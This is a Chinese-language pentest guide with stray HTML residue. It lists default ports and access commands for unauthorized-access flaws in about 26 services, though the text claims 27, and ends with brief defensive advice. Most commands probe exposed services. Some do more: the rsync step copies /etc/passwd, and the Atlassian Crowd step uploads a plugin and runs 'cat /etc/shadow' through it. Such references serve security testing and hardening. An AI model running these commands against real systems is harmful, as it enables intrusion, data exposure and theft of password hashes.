端口未授权访问漏洞全面总结与利用指南<\/h1>

一、概述<\/h2>
端口未授权访问是网络安全中常见的高危漏洞，攻击者无需认证即可直接访问服务接口或管理界面，可能导致信息泄露、权限提升甚至远程代码执行。本文全面总结了27种常见服务的未授权访问漏洞及其利用方法。<\/p>

二、常见未授权访问漏洞详解<\/h2>

1. Memcached 未授权访问<\/h3>

默认端口<\/strong>: 11211<\/li>

验证方法<\/strong>:
telnet 10.10.4.89 11211<\/span> <\/span><\/span>nc -vv 10.10.4.89 11211<\/span> <\/span><\/span><\/code><\/pre><\/li> 利用命令<\/strong>: stats<\/code> 查看服务信息<\/li> <\/ul> 2. ZooKeeper 未授权访问<\/h3> 默认端口<\/strong>: 2181, 2182<\/li> 验证方法<\/strong>: .\/zkCli.sh -timeout 0<\/span> -r -server 10.10.4.72:2181 <\/span><\/span><\/code><\/pre>Windows: zkCli.cmd -timeout 0 -r -server 10.10.4.72:2181<\/code><\/li> <\/ul> 3. Elasticsearch 未授权访问<\/h3> 默认端口<\/strong>: 9100, 9200, 9300<\/li> 验证方法<\/strong>: curl http:\/\/10.2.20.48:9200\/ <\/span><\/span>curl http:\/\/10.2.20.48:9200\/_cat <\/span><\/span>curl http:\/\/10.2.20.48:9200\/_cat\/_river\/_search <\/span><\/span>curl http:\/\/10.2.20.48:9200\/cat\/indices <\/span><\/span>curl http:\/\/10.2.20.48:9100\/metrics <\/span><\/span><\/code><\/pre><\/li> <\/ul> 4. Kibana 未授权访问<\/h3> 默认端口<\/strong>: 5601<\/li> 验证方法<\/strong>: 直接访问 https:\/\/10.10.4.89:5601\/ https:\/\/10.10.4.89\/app\/kibana <\/code><\/pre> <\/li> <\/ul> 5. Docker Remote API 未授权访问<\/h3> 默认端口<\/strong>: 2375<\/li> 验证方法<\/strong>: http:\/\/10.10.4.89:2375\/ http:\/\/10.10.4.89:2375\/version docker -H tcp:\/\/10.10.4.89:2375 version docker -H tcp:\/\/10.10.4.89:2375 images <\/code><\/pre> <\/li> <\/ul> 6. Kubernetes Api Server 未授权访问<\/h3> 默认端口<\/strong>: 8080, 6443<\/li> 验证方法<\/strong>: http:\/\/10.10.4.89:8080\/ http:\/\/10.10.4.89:8080\/ui http:\/\/192.168.56.101:8001\/api\/v1\/namespaces\/kube-system\/services\/https:kubernetes-dashboard:\/proxy\/#!\/login <\/code><\/pre> <\/li> <\/ul> 7. Hadoop 未授权访问<\/h3> 默认端口<\/strong>: 8088<\/li> 验证方法<\/strong>: http:\/\/192.168.18.129:8088\/cluster curl -s -i -X POST -H 'Accept: application\/json' -H 'Content-Type: application\/json' http:\/\/ip:8088\/ws\/v1\/cluster\/apps --data-binary @1.json <\/code><\/pre> <\/li> <\/ul> 8. Jenkins未授权访问<\/h3> 默认端口<\/strong>: 8080<\/li> 验证方法<\/strong>: http:\/\/192.168.18.129:8080\/manage<\/code><\/li> <\/ul> 9. ActiveMQ未授权访问<\/h3> 默认端口<\/strong>: 8161<\/li> 默认凭证<\/strong>: admin\/admin<\/li> <\/ul> 10. RabbitMQ未授权访问<\/h3> 验证URL<\/strong>: http:\/\/10.10.4.89:15672 http:\/\/10.10.4.89:25672\/ http:\/\/10.10.4.89:15692\/ <\/code><\/pre> <\/li> 默认凭证<\/strong>: guest\/guest<\/li> <\/ul> 11. Springboot actuator 未授权访问<\/h3> 特征<\/strong>: 绿叶子图标和报错页面<\/li> 验证方法<\/strong>: http:\/\/10.2.20.48:\/autoconfig <\/code><\/pre> <\/li> <\/ul> 12. FTP未授权访问(匿名登录)<\/h3> 默认端口<\/strong>: 21<\/li> 验证方法<\/strong>: ftp:\/\/ip:port\/<\/code><\/li> <\/ul> 13. JBOSS 未授权访问<\/h3> 特征<\/strong>: 8080端口左上角有JBoss logo<\/li> 验证方法<\/strong>: http:\/\/ip:jboss端口\/jmx-console http:\/\/ip:jboss端口\/web-console <\/code><\/pre> <\/li> <\/ul> 14. LDAP未授权访问<\/h3> 验证方法<\/strong>: 使用ldapbrowser直接连接获取目录内容<\/li> <\/ul> 15. Rsync 未授权访问<\/h3> 默认端口<\/strong>: 873<\/li> 验证方法<\/strong>: rsync rsync:\/\/{<\/span>target_ip}<\/span>\/ <\/span><\/span>rsync rsync:\/\/172.16.2.250:873\/src <\/span><\/span>rsync rsync:\/\/172.16.2.250:873\/src\/etc\/passwd .\/ <\/span><\/span><\/code><\/pre><\/li> <\/ul> 16. VNC 未授权访问<\/h3> 默认端口<\/strong>: 5900, 5901<\/li> 验证方法<\/strong>: vncviewer 192.168.15.8<\/code><\/li> <\/ul> 17. Dubbo 未授权访问<\/h3> 验证方法<\/strong>: telnet IP port<\/code><\/li> <\/ul> 18. NFS 共享目录未授权访问<\/h3> 默认端口<\/strong>: 2049, 20048<\/li> 验证方法<\/strong>: showmount -e 192.168.70.162 <\/span><\/span>mount -t nfs 192.168.70.162:\/grdata \/mnt <\/span><\/span><\/code><\/pre><\/li> <\/ul> 19. Druid 未授权访问<\/h3> 常见路径<\/strong>: \/druid\/websession.html \/system\/druid\/websession.html \/webpage\/system\/druid\/websession.html <\/code><\/pre> <\/li> <\/ul> 20. CouchDB 未授权访问<\/h3> 默认端口<\/strong>: 5984<\/li> 验证方法<\/strong>: curl http:\/\/192.168.18.129:5984 <\/span><\/span>curl http:\/\/192.168.18.129:5984\/_config <\/span><\/span><\/code><\/pre><\/li> <\/ul> 21. Atlassian Crowd 未授权访问<\/h3> 默认端口<\/strong>: 8095<\/li> 利用方法<\/strong>: curl --form "file_cdl=@applinks-plugin-5.4.12.jar"<\/span> http:\/\/192.168.18.138:8095\/crowd\/admin\/uploadplugin.action -v <\/span><\/span><\/code><\/pre>访问: http:\/\/10.10.20.166:8095\/crowd\/plugins\/servlet\/exp?cmd=cat%20\/etc\/shadow<\/code><\/li> <\/ul> 22. Jupyter Notebook 未授权访问<\/h3> 验证方法<\/strong>: 访问 http:\/\/192.168.18.129:8888<\/code> 通过Terminal执行命令<\/li> <\/ul> 23. Windows IPC共享未授权访问<\/h3> 默认端口<\/strong>: 139<\/li> <\/ul> 24. RTSP未授权访问<\/h3> 默认端口<\/strong>: 554<\/li> 特征<\/strong>: 视频流直接暴露<\/li> <\/ul> 25. Redis未授权访问<\/h3> 默认端口<\/strong>: 6379<\/li> 验证方法<\/strong>: redis-cli -h 10.2.20.73 -p 6379<\/span> <\/span><\/span>10.2.20.73:6379> info <\/span><\/span><\/code><\/pre><\/li> <\/ul> 26. MongoDB未授权访问<\/h3> 默认端口<\/strong>: 27017<\/li> 验证方法<\/strong>: mongo --host 10.2.20.34 --port 27017<\/span> <\/span><\/span>xxx-test:SECONDARY> show dbs <\/span><\/span><\/code><\/pre><\/li> <\/ul> 三、防御建议<\/h2> 修改默认端口<\/li> 配置访问控制列表(ACL)<\/li> 启用身份验证机制<\/li> 限制网络访问(防火墙规则)<\/li> 定期更新服务版本<\/li> 监控异常访问行为<\/li> <\/ol> 四、总结<\/h2> 本文详细列出了27种常见服务的未授权访问漏洞及其验证方法，安全人员可利用这些信息进行安全检测，管理员则应针对这些风险点加强防护。记住，发现漏洞后应及时修复，避免被恶意利用。<\/p>